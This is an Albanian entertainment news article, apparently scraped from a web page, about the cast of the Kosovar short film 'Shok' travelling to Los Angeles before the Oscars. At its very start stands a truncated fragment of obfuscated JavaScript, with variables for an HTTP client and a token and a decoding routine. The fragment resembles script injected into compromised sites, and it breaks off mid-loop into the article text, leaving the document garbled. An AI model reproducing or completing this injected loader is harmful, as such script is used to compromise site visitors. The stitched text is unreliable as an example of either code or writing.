;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kasti i ‘Shok’ niset për Los Angeles

By

Kur ka mbetur më pak se një javë nga mbajtja e ceremonisë së ndarjes së çmimeve ‘Oscar’, kasti i filmit kosovar ‘Shok’ ka marrë rrugë drejt Los Angeles.

Ka qenë vetë drejtori i Qendrës Kinematografike të Kosovës, Arben Zharku ai që ka postuar një foto nga fluturimi përtej oqeanit në Shtetet e Bashkuara të Amerikës.

Pjesë e ekipit janë dy djemtë e filmit, Lumi Veseli dhe Andi Bajgora bashkë me aktorët Aurita Agushi, Astrit Kabashi, Besnik Krapi e të tjerë.

Teksa presim më të mirën nga kjo ceremoni ku ‘Shok’ është nominuar në kategorinë e filmit të metrazhit të shkurtë, na mbetet të urojmë që ekipi do kthehet edhe me trofeun që do shënojë histori në kinematografinë shqiptare. /Prive.al/

 

Artikuj të ngjashëm